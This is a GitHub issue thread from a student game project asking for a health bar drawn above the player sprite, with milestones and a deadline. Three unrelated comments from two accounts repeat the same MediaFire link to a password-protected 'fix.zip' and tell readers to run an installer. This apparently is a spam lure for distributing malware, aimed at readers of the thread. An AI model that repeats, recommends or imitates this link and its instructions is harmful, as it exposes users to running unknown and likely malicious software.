### ISSUE TITLE
Player's Health Bar 

### ISSUE THREAD

**Issue by manya-k** [UQcsse3200/2024-studio-1#80]
# **Description**
**Task:** Character #3 
**Feature:**  Implement a health bar on top of the player's head that represents the health percentage the player jas. The health percentage is also given on the top left corner of the screen. 
The health bar should consist of red background with a green filling representing the health. 
The bar's position should be aligned with player's position at all times.

 
## **Example **
- **Part**: As the player moves, the health bar moves with the player such that it is always top of the player. It makes it easier for users to see how much health they have remaining in the game.

# **Dependencies**
- [x] shape rendered is required to draw the health bar (already given)

# **Milestones**
List of steps that need to be completed for this task.
- [x] Watch the tutorials for shape rendered(Aug. 23)
- [x] Create a new class to display the heath bar (Aug 23)
- [x] draw the shape of the health bar using shape renderer (Aug 25)
- [ ] Documentation (Aug 26)
- [ ] Manual Testing (Aug 27)
 
**Completion Deadline:** Aug. 28

# **Documentation**
- TBA
- [JavaDoc](JavaDoc/main/com.csse3200.game.components.player/PlayerHealthDisplay.Java)
- ...
 
# **Member**
- @manya-k

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
